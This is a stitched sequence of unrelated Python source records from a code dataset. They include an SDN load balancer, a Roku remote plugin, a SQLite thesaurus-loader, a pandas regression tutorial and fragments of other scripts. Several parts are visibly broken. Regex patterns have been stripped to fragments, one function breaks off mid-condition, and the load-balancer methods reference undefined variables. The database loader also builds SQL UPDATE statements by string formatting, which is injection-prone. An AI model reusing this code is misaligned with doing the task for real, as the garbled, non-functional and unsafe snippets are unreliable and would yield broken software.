ether_types.ETH_TYPE_ARP)\n a = arp.arp(1, 0x0800, 6, 4, 2, srcMac, srcIp, dstMac, dstIp)\n p = Packet()\n p.add_protocol(e)\n p.add_protocol(a)\n p.serialize()\n\n # ARP action list\n actions = [ofp_parser.OFPActionOutput(ofp.OFPP_IN_PORT)]\n match = ofp_parser.OFPMatch(in_port=in_port)\n # ARP output message\n out = ofp_parser.OFPPacketOut(\n datapath=datapath,\n match=match,\n actions=actions,\n data=p.data\n )\n datapath.send_msg(out) # Send out ARP reply\n # self.logger.info(\"%s: ARP reply send\", datetime.datetime.now().strftime('%H:%M:%S.%f'))\n\n # Sets up the flow table in the switch to map IP addresses correctly.\n def add_flow(self, datapath, priority, match, actions, idle_timeout=None, hard_timeout=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if idle_timeout:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, match=match, instructions=inst,\n idle_timeout=idle_timeout, hard_timeout=hard_timeout)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, match=match, instructions=inst)\n datapath.send_msg(mod)\n\n # Sets up the flow table in the switch to map IP addresses correctly.\n def add_twoway_flow(self, dp, msg, idle_timeout=None, hard_timeout=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if idle_timeout:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, match=match, instructions=inst,\n idle_timeout=idle_timeout, hard_timeout=hard_timeout)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, match=match, instructions=inst)\n datapath.send_msg(mod)\n\npreviousServer = \"10.0.0.13\"\n\n\ndef getServerIp(loadBalancingAlgorithm):\n global previousServer\n\n if loadBalancingAlgorithm == 'random':\n return random.choice([\"10.0.0.11\", \"10.0.0.12\", \"10.0.0.13\", \"10.0.0.14\"])\n\n elif loadBalancingAlgorithm == 'roundRobin':\n if previousServer == \"10.0.0.11\":\n previousServer = \"10.0.0.12\"\n return \"10.0.0.12\"\n elif previousServer == \"10.0.0.12\":\n previousServer = \"10.0.0.13\"\n return \"10.0.0.13\"\n elif previousServer == \"10.0.0.13\":\n previousServer = \"10.0.0.14\"\n return \"10.0.0.14\"\n else:\n previousServer = \"10.0.0.11\"\n return \"10.0.0.11\"\n\n elif loadBalancingAlgorithm == 'leastBandwidth':\n if self.throuhput[11:15].index(min(self.throuhput[11:15])) == 11:\n return \"10.0.0.11\"\n elif self.throuhput[11:15].index(min(self.throuhput[11:15])) == 12:\n return \"10.0.0.12\"\n elif self.throuhput[11:15].index(min(self.throuhput[11:15])) == 13:\n return \"10.0.0.13\"\n else:\n return \"10.0.0.14\"\n","sub_path":"LoadBalancer.py","file_name":"LoadBalancer.py","file_ext":"py","file_size_in_byte":20004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"548866877","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n#/////////////////////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\n# Roku Network Remote Control by RogueProeliator \n# \tSee plugin.py for more plugin details and information\n#/////////////////////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\n\n#/////////////////////////////////////////////////////////////////////////////////////////\n# Python imports\n#/////////////////////////////////////////////////////////////////////////////////////////\nimport functools\nimport httplib\nimport os\nimport Queue\nimport re\nimport string\nimport sys\nimport threading\nimport telnetlib\nimport time\nimport urllib\n\nimport indigo\nimport RPFramework\n\n#/////////////////////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\n# RokuNetworkRemoteDevice\n#\tHandles the configuration of a single Roku device that is connected to this plugin;\n#\tthis class does all the 'grunt work' of communications with the Roku\n#/////////////////////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\nclass RokuNetworkRemoteDevice(RPFramework.RPFrameworkRESTfulDevice.RPFrameworkRESTfulDevice):\n\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t# Class construction and destruction methods\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# Constructor called once upon plugin class receiving a command to start device\n\t# communication. 
The plugin will call other commands when needed, simply zero out the\n\t# member variables\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef __init__(self, plugin, device):\n\t\tsuper(RokuNetworkRemoteDevice, self).__init__(plugin, device)\n\t\t\n\t\t# get the device properties; we may need to upgrade users from the old version of\n\t\t# addresses to the new version\n\t\tdevProps = self.indigoDevice.pluginProps\n\t\t\n\t\ttempRokuIPAddress = devProps.get(u'rokuIPAddress', u'')\n\t\ttempRokuSerialNumber = devProps.get(u'rokuEnumeratedUSN', u'')\n\t\tif tempRokuIPAddress != u'':\n\t\t\tdevProps[u'httpAddress'] = tempRokuIPAddress\n\t\t\tdevProps[u'rokuIPAddress'] = u''\n\t\t\tdevice.replacePluginPropsOnServer(devProps)\n\t\telif tempRokuSerialNumber != u'':\n\t\t\tdevProps[u'httpAddress'] = tempRokuSerialNumber\n\t\t\tdevProps[u'rokuEnumeratedUSN'] = u''\n\t\t\tdevice.replacePluginPropsOnServer(devProps)\n\t\tself.rokuNetworkAddress = devProps.get(u'httpAddress', u'')\n\n\t\tself.cachedIPAddress = u''\n\t\tself.hostPlugin.logger.debug(u'Roku Address is ' + self.rokuNetworkAddress)\n\n\t\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t# Processing and command functions\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# This routine will process the commands that are not processed automatically by the\n\t# base class; it will be called on a concurrent thread\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef handleUnmanagedCommandInQueue(self, deviceHTTPAddress, rpCommand):\n\t\tif rpCommand.commandName == u'SEND_KEYBOARD_STRING':\n\t\t\t# needs to send a string of text to the roku device as a series of keypress\n\t\t\t# commands (RESTFUL_PUT commands)\n\t\t\tvalidatedText = re.sub(r'[^a-z\\d ]', '', rpCommand.commandPayload.lower())\n\t\t\tif validatedText == u'':\n\t\t\t\tself.hostPlugin.logger.debug(u'Ignoring send text to Roku, validated string is blank (source: ' + rpCommand.commandPayload + u')')\n\t\t\telse:\n\t\t\t\tself.hostPlugin.logger.threaddebug(u'Sending keyboard text: ' + validatedText)\n\t\t\t\tpauseBetweenKeys = float(self.indigoDevice.pluginProps.get(u'rokuLiteralCommandPause', u'0.1'))\n\t\t\t\tfor char in validatedText:\n\t\t\t\t\tself.queueDeviceCommand(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Lit_' + urllib.quote_plus(char), postCommandPause=pauseBetweenKeys))\n\t\t\n\t\telif rpCommand.commandName == u'DOWNLOAD_CHANNEL_ICONS':\n\t\t\t# the user has requested that we download all of the icons for channels on the Roku device...\n\t\t\tdownloadDestination = rpCommand.commandPayload\n\t\t\tif downloadDestination == None or downloadDestination == u'':\n\t\t\t\tdownloadDestination = indigo.server.getInstallFolderPath()\n\t\t\t\tself.hostPlugin.logger.threaddebug(u'Indigo installation folder: ' + downloadDestination)\n\t\t\t\tdownloadDestination = os.path.join(downloadDestination, u'IndigoWebServer/images/controls/static')\n\t\t\t \n\t\t\t# retrieve the list of channels/applications and attempt to download\n\t\t\t# each application's icon\n\t\t\tappList = self.retrieveAppList()\n\t\t\t\n\t\t\tfor rokuApp in appList:\n\t\t\t\ticonFile = None\n\t\t\t\ttry:\n\t\t\t\t\tapplicationId = 
rokuApp[0]\n\t\t\t\t\tapplicationName = rokuApp[2]\n\t\t\t\t\t\n\t\t\t\t\tself.hostPlugin.logger.debug(u'Attempting download of icon for App #' + applicationId + u' (' + applicationName + u')')\n\t\t\t\t\tconn = httplib.HTTPConnection(deviceHTTPAddress[0], deviceHTTPAddress[1])\n\t\t\t\t\tconn.connect()\n\t\t\t\t\trequest = conn.putrequest(u'GET', u'/query/icon/' + applicationId)\n\t\t\t\t\tconn.endheaders()\n\t\t\t\t\t\n\t\t\t\t\ticonResponse = conn.getresponse()\n\t\t\t\t\ticonImageExtension = iconResponse.getheader(u'content-type').replace(u'image/', u'')\n\t\t\t\t\ticonImageSaveFN = os.path.join(downloadDestination, u'RokuChannelIcon_' + applicationId + u'.' + iconImageExtension)\n\t\t\t\t\t\n\t\t\t\t\tself.hostPlugin.logger.debug(u'Saving icon to ' + iconImageSaveFN)\n\t\t\t\t\ticonFile = open(RPFramework.RPFrameworkUtils.to_str(iconImageSaveFN), \"wb\")\n\t\t\t\t\ticonFile.write(iconResponse.read())\n\t\t\t\t\ticonFile.close()\n\t\t\t\t\t\n\t\t\t\t\tconn.close()\n\t\t\t\texcept:\n\t\t\t\t\tif iconFile != None:\n\t\t\t\t\t\ticonFile.close()\n\t\t\t\t\tself.hostPlugin.exceptionLog()\n\t\t\t\t\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# This routine should return the HTTP address that will be used to connect to the\n\t# RESTful device. It may connect via IP address or a host name\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef getRESTfulDeviceAddress(self):\n\t\tself.hostPlugin.logger.debug(u'IP address requested for Roku Device: ' + self.rokuNetworkAddress)\n\t\t\t\n\t\t# if the ip address has not been filled in then we must look it up by serialNumber\n\t\t# via the SSDP service\n\t\tif self.hostPlugin.isIPv4Valid(self.rokuNetworkAddress):\n\t\t\tipAddress = self.rokuNetworkAddress\n\t\telse:\n\t\t\tipAddress = self.obtainRokuIPAddress(self.rokuNetworkAddress)\n\t\t\t\n\t\t# return the IP address to the calling procedure...\n\t\treturn (ipAddress, 8060)\n\t\t\t\n\t\t\t\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t# Private Utility Routines\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# This routine will obtain the IP address for a Roku given the serial number; it does\n\t# this synchronously with the expectation that it is called from a concurrent thread\n\t# when asynchronous operations are required\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef obtainRokuIPAddress(self, serialNumber):\n\t\tif self.cachedIPAddress == u'':\n\t\t\tself.hostPlugin.updateUPNPEnumerationList(self.indigoDevice.deviceTypeId)\n\t\t\trokuList = self.hostPlugin.enumeratedDevices\n\t\t\tfor rokuDevice in rokuList:\n\t\t\t\tenumeratedSerial = string.replace(rokuDevice.usn, 'uuid:roku:ecp:', '')\n\t\t\t\tif enumeratedSerial == serialNumber:\n\t\t\t\t\tdiscoveredIPAddress = re.match(r'http://([\\d\\.]*)\\:{0,1}(\\d+)', rokuDevice.location, re.I).group(1)\n\t\t\t\t\tself.hostPlugin.logger.debug(u'Found IP address of ' + discoveredIPAddress + u' for serial #' + serialNumber)\n\t\t\t\t\tself.cachedIPAddress = discoveredIPAddress\n\t\t\t\t\tself.indigoDevice.updateStateOnServer(u'lastDiscoveredIPAddress', value=discoveredIPAddress)\n\t\t\t\t\treturn discoveredIPAddress\n\t\t\t\n\t\t\t# if execution made it through the loop then the device was not found... 
first attempt\n\t\t\t# to read the last known IP address, then bail with a failure to find\n\t\t\tif self.indigoDevice.states.get(u'lastDiscoveredIPAddress', u'') != u'':\n\t\t\t\tlastKnownIP = self.indigoDevice.states.get(u'lastDiscoveredIPAddress')\n\t\t\t\tself.hostPlugin.logger.debug(u'Using last discovered IP address: ' + lastKnownIP)\n\t\t\t\treturn lastKnownIP\n\t\t\telse:\n\t\t\t\tself.hostPlugin.logger.error(u'IP not found for serial #' + serialNumber)\n\t\t\t\treturn u''\n\t\telse:\n\t\t\treturn self.cachedIPAddress\n\t\t\t\t\n\t\t\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t# Public command-interface functions\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# This routine will retrieve a list of the available applications on the connected\n\t# roku device (it does this synchronously with the expectation that it is called on\n\t# a concurrent thread when necessary\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef retrieveAppList(self):\n\t\ttry:\n\t\t\t# determine the IP address used to connect to the roku device\n\t\t\tdeviceIPAddress = self.getRESTfulDeviceAddress()\n\t\t\t\t\n\t\t\t# send a GET to the roku which should result in a list of applications\n\t\t\t# available (in XML format)\n\t\t\tself.hostPlugin.logger.debug(u'Sending /query/apps request to ' + deviceIPAddress[0])\n\t\t\tconn = httplib.HTTPConnection(deviceIPAddress[0], int(deviceIPAddress[1]))\n\t\t\tconn.connect()\n\t\t\trequest = conn.putrequest(\"GET\", \"/query/apps\")\n\t\t\tconn.endheaders()\n\t\t\t\n\t\t\t# read the response to the query\n\t\t\tresponseToREST = conn.getresponse()\n\t\t\tresponseStatus = responseToREST.status\n\t\t\tbodyText = responseToREST.read()\n\t\t\tself.hostPlugin.logger.threaddebug(u'App list response: ' + RPFramework.RPFrameworkUtils.to_unicode(responseStatus) + u'; body: ' + RPFramework.RPFrameworkUtils.to_unicode(bodyText))\n\t\t\t\n\t\t\t# parse out the XML returned which should be in the format of:\n\t\t\t#\t\n\t\t\t#\t[appname]\n\t\t\t# note that this may not be standard XML... so use a regular expression to parse\n\t\t\treAppParser = re.compile(\"\\(.*)\\\")\n\t\t\tappMatches = reAppParser.findall(bodyText)\n\t\t\treturn appMatches\n\t\texcept:\n\t\t\tself.hostPlugin.exceptionLog()\n\t\t\treturn []\n\t\t\t\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# Send a series of commands to attempt to perform a search on a channel\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef performSearchOnChannel(self, selectedChannel, channelLaunchPause, searchText, stopAtSuggestions):\t\t\n\t\t# the search commands depend on the channel being searched... 
each channel may\n\t\t# require special processing; an empty searchText string will result in the user\n\t\t# just being brought to the search box\n\t\tcommands = []\n\t\t\n\t\tliteralPauseTime = float(self.indigoDevice.pluginProps.get(u'rokuLiteralCommandPause', u'0.1'))\n\t\tirPauseTime = float(self.indigoDevice.pluginProps.get(u'rokuIRCommandPause', u'0.1'))\n\t\t\n\t\t# -=-=- LAUNCH SEARCH SCREEN COMMANDS -=-=-\n\t\tif selectedChannel == u'13':\n\t\t\t# -=-=- AMAZON PRIME -=-=-\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/launch/13'))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=channelLaunchPause))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Select'))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=u'2'))\n\t\t\t\t\n\t\telif selectedChannel == u'12':\n\t\t\t# -=-=- NETFLIX -=-=-\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/launch/12'))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=channelLaunchPause))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Search'))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=u'2'))\n\t\t# -=-=- END LAUNCH SEARCH SCREEN COMMANDS -=-=-\n\t\t\t\t\n\t\t# -=-=- ENTER SEARCH STRING COMMANDS -=-=-\n\t\tif searchText != u'':\n\t\t\tfor char in searchText:\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'/keypress/Lit_' + urllib.quote_plus(char), postCommandPause=literalPauseTime))\n\t\t\t\t\n\t\t# -=-=- POST SEARCH TERM COMMANDS -=-=-\n\t\tif searchText != \"\":\n\t\t\tif stopAtSuggestions == True:\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, 
commandPayload=u'http|*|/keypress/Right'))\n\t\t\telse:\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Enter'))\n\t\t# -=-=- END POST SEARCH TERM COMMANDS -=-=-\n\t\t\t\t\n\t\t# send the commands to the roku now...\n\t\tfor cmd in commands:\n\t\t\tself.queueDeviceCommand(cmd)\n","sub_path":"Roku Network Remote.indigoPlugin/Contents/Server Plugin/rokuNetworkRemoteDevice.py","file_name":"rokuNetworkRemoteDevice.py","file_ext":"py","file_size_in_byte":15070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"328011791","text":"# fonction pour voir quel est le plus grand entre l'energie limite et l'enerve potentiel\ndef ep (m,h,el,g=9.8):\n E=m*h*g\n if E\\s*'\n r'(.*)\\s*'\n r'(.*)\\s*'\n r'(.*)\\s*'\n r'(\\w*)\\s*'\n r'(.*)\\s*'\n)\nCONCEPTS_PATTERN = re.compile(\n r'\\s*'\n r'(.*)\\s*'\n r'(.*)\\s*'\n r'(.*)'\n)\n\n\nclass DBCreator:\n def __init__(self, new=False):\n with sqlite3.connect(config['database']) as self.conn:\n self.cursor = self.conn.cursor()\n # logger.info('Created db')\n # self.create_tables()\n # logger.info('Created tables')\n # self.load_concepts()\n # logger.info('Filled concepts')\n # self.load_synonyms()\n # logger.info('Filled synonyms')\n # self.load_entries()\n # logger.info('Filled entries')\n # self.load_relations()\n # logger.info('Filled relations')\n # self.load_close_words()\n # logger.info('Filled close words')\n self.add_normal_form()\n logger.info('Added normal form')\n\n def create_tables(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE concepts(\n id INTEGER primary key,\n name TEXT not null,\n gloss TEXT,\n domain TEXT\n );\n \"\"\")\n self.cursor.execute(\"\"\"\n CREATE INDEX concept_names_idx ON concepts(name);\n \"\"\")\n self.cursor.execute(\"\"\"\n CREATE TABLE text_entry(\n entry_id INTEGER primary key,\n name TEXT,\n lemma TEXT,\n main_word TEXT,\n synt_type TEXT,\n pos_string TEXT,\n is_polysemic integer\n );\n \"\"\")\n self.cursor.execute(\"\"\"\n CREATE TABLE synonyms(\n concept_id INTEGER references concepts,\n entry_id INTEGER references text_entry (entry_id)\n );\n \"\"\")\n self.cursor.execute(\"\"\"\n CREATE TABLE relations(\n id_from INTEGER references concepts,\n id_to INTEGER references concepts,\n name TEXT,\n asp TEXT\n );\n \"\"\")\n\n @staticmethod\n def _file_window(file, num_lines):\n window = deque((file.readline() for _ in range(1, num_lines)), maxlen=num_lines)\n text = \"\".join(window)\n return text\n\n def load_concepts(self):\n with open(join(config['rutez_dir'], 'concepts.xml'), 'r', encoding=\"utf-8\") as concepts:\n for _ in concepts:\n line = self._file_window(concepts, 5)\n search_line = CONCEPTS_PATTERN.search(line)\n if search_line is None:\n continue\n self.cursor.execute(\"\"\"\n INSERT INTO concepts(id, name, gloss, domain) VALUES (?, ?, ?, ?)\n \"\"\", [search_line.group(1), search_line.group(2), search_line.group(3), search_line.group(4)])\n self.conn.commit()\n\n def load_relations(self):\n with open(join(config['rutez_dir'], 'relations.xml'), 'r', encoding=\"utf-8\") as relations:\n for line in relations:\n from_search = FROM_PATTERN.search(line) or None\n if from_search is None:\n continue\n from_search = from_search.group(1)\n to_search = TO_PATTERN.search(line).group(1)\n name_search = NAME_PATTERN.search(line).group(1)\n asp_search = ASP_PATTERN.search(line).group(1)\n if asp_search == ' ':\n asp_search = None\n 
self.cursor.execute(\"\"\"\n INSERT INTO relations(id_from, id_to, name, asp) \n VALUES (?, ?, ?, ?)\"\"\", [from_search, to_search, name_search, asp_search]\n )\n self.conn.commit()\n\n def load_synonyms(self):\n with open(join(config['rutez_dir'], 'synonyms.xml'), 'r', encoding=\"utf-8\") as synonyms:\n for line in synonyms:\n id_search = ID_PATTERN.search(line) or None\n entry_id_search = ENTRY_ID_PATTERN.search(line) or None\n if id_search is None or entry_id_search is None:\n continue\n id_search = id_search.group(1)\n entry_id_search = entry_id_search.group(1)\n self.cursor.execute(\"\"\"\n INSERT INTO synonyms(concept_id, entry_id)\n VALUES (?, ?)\"\"\", [id_search, entry_id_search]\n )\n self.conn.commit()\n\n def _delete_duplicates(self):\n self.cursor.execute(\"\"\"\n DELETE from close_words\n WHERE rowid not in(\n SELECT MIN(ROWID)\n FROM close_words\n GROUP BY id_from, entry_id, id_to\n );\n \"\"\")\n\n def _add_new_relation(self, order=2):\n self.cursor.execute(\"\"\"\n INSERT INTO close_words\n SELECT DISTINCT close_words.id_from, close_words.entry_id,\n relations.id_to, s1.entry_id, {0}\n FROM relations\n INNER JOIN close_words ON relations.id_from = close_words.id_to and close_words.relation_order = {1}\n INNER JOIN synonyms s1 on relations.id_to = s1.concept_id\n INNER JOIN text_entry t1 on s1.entry_id = t1.entry_id and t1.is_polysemic = 0\n WHERE close_words.id_from != relations.id_to\n \"\"\".format(order, order-1))\n\n def load_entries(self):\n with open(join(config['rutez_dir'], 'text_entry.xml'), 'r', encoding=\"utf-8\") as text_entry:\n for _ in text_entry:\n line = self._file_window(text_entry, 7)\n search_line = TEXT_ENTRY_PATTERN.search(line)\n if search_line is None:\n continue\n self.cursor.execute(\"\"\"\n INSERT INTO text_entry \n VALUES (?, ?, ?, ?, ?, ?, ?)\"\"\",\n [\n search_line.group(1),\n search_line.group(2),\n search_line.group(3),\n search_line.group(4),\n search_line.group(5),\n search_line.group(6),\n 0\n ]\n )\n self.conn.commit()\n self.cursor.execute(\"\"\"\n UPDATE text_entry SET is_polysemic = 1\n WHERE text_entry.entry_id in(\n SELECT entry_id as entry\n FROM synonyms\n GROUP BY entry\n HAVING COUNT(*) > 1\n )\n \"\"\")\n self.conn.commit()\n\n def load_close_words(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE close_words(\n id_from integer, \n entry_id integer,\n id_to integer, \n entry_id_to integer, \n relation_order integer\n );\"\"\")\n\n self.cursor.execute(\"\"\"\n INSERT INTO close_words\n SELECT relations.id_from, s1.entry_id, relations.id_to, s2.entry_id, 1\n FROM relations\n INNER JOIN synonyms s1 ON relations.id_from = s1.concept_id\n INNER JOIN synonyms s2 on relations.id_to = s2.concept_id\n INNER JOIN text_entry t1 on s1.entry_id = t1.entry_id and t1.is_polysemic = 1\n INNER JOIN text_entry t2 on s2.entry_id = t2.entry_id and t2.is_polysemic = 0;\n \"\"\")\n logger.info('1st relation')\n\n self._add_new_relation(order=2)\n self._delete_duplicates()\n logger.info('2nd relation')\n\n self._add_new_relation(order=3)\n self._delete_duplicates()\n logger.info('3rd relation')\n\n self._add_new_relation(order=4)\n self._delete_duplicates()\n logger.info('4th relation')\n\n self.conn.commit()\n\n def add_normal_form(self):\n morph = pymorphy2.MorphAnalyzer()\n # self.cursor.execute(\"\"\"\n # ALTER TABLE text_entry\n # ADD normal_form TEXT;\n # \"\"\")\n self.conn.isolation_level = None\n self.cursor.execute(\"\"\"\n SELECT name\n FROM text_entry\n \"\"\")\n names = self.cursor.fetchall()\n result = {}\n for name in names:\n name 
= name[0]\n if name:\n words = name.split(' ')\n words = [morph.parse(word)[0].normal_form for word in words]\n result.update({name: ' '.join(words)})\n\n self.cursor.execute('begin')\n i = 0\n for key, value in tqdm(result.items()):\n self.cursor.execute(\"\"\"\n UPDATE text_entry \n SET normal_form = '{1}'\n WHERE name = '{0}';\n \"\"\".format(key.upper(), value.upper()))\n i += 1\n if not i % 1000:\n self.cursor.execute('commit')\n self.cursor.execute('begin')\n self.cursor.execute('commit')\n\n\ndef create_database():\n db = DBCreator()\n\n\nif __name__ == '__main__':\n create_database()\n","sub_path":"disambiguator/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":9940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"262857786","text":"#imports\n\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n'''\nPandas Basics: Reading File, Summarizing, Handling Missing Values, Filtering, Sorting\n'''\n\n#read in the CSV file\ndrinks = pd.read_csv('drinks.csv')\ntype(drinks)\n\n#examine the data\ndrinks\ndrinks.head()\ndrinks.describe()\n\n# find missing values in a DataFrame\ndrinks.isnull() # Dataframe of booleans\ndrinks.isnull().sum() # convert booleans to integers and add\n\n# handling missing values\ndrinks.dropna()\ndrinks.fillna(value = \"NA\")\ndrinks.fillna(value = \"NA\", inplace = True)\n\n# selecting a column 'series'\ndrinks['continent']\ndrinks.continent\ntype(drinks.continent)\n\n# summarizing a non-numeric column\ndrinks.continent.describe()\ndrinks.continent.value_counts()\n\n# Selecting multiple columns\ndrinks[['country', 'beer_servings']]\n\n# add a new column as a function of existing columns\ndrinks['total_servings'] = drinks.beer_servings + drinks.spirit_servings + drinks.wine_servings\ndrinks.head()\n\n# Logical filtering and sorting - see other code\n\n\n#bar plot of number of countries in each continent\ndrinks.continent.value_counts().plot(kind='bar', title='Countries per Continent')\nplt.xlabel('Continent')\nplt.ylabel('Count')\nplt.show()\n\n# features\nX = drinks[['beer_servings', 'spirit_servings']]\nX.shape\n\n# response\ny = drinks['wine_servings']\n\n\n# fit a linear model\nlm = LinearRegression()\nlm.fit(X,y)\n\n#examine the intercept and coefficients\nlm.intercept_\nlm.coef_\n\n# predict for all countries\npreds = lm.predict(X)\npreds\n\n# computer the MSE RMSE\nmean_squared_error(y, preds)\nnp.sqrt(mean_squared_error(y, preds))\n","sub_path":"ga_datascience.py","file_name":"ga_datascience.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"484371440","text":"\"\"\"\nAuthor: Armand Vega\nDate: 10/11/2019\nNotes: passes 13/18 test cases on codesignal,\n probably needs rewriting for optimization and decreased execution time\n\"\"\"\ndef packetDescrambler(seq, fragmentData, n):\n #create empty dictionary\n packets = {}\n #create object to iterate through\n packet_zip = zip(seq, fragmentData)\n for key, val in packet_zip:\n if key in packets:\n packets[key] += val\n else:\n 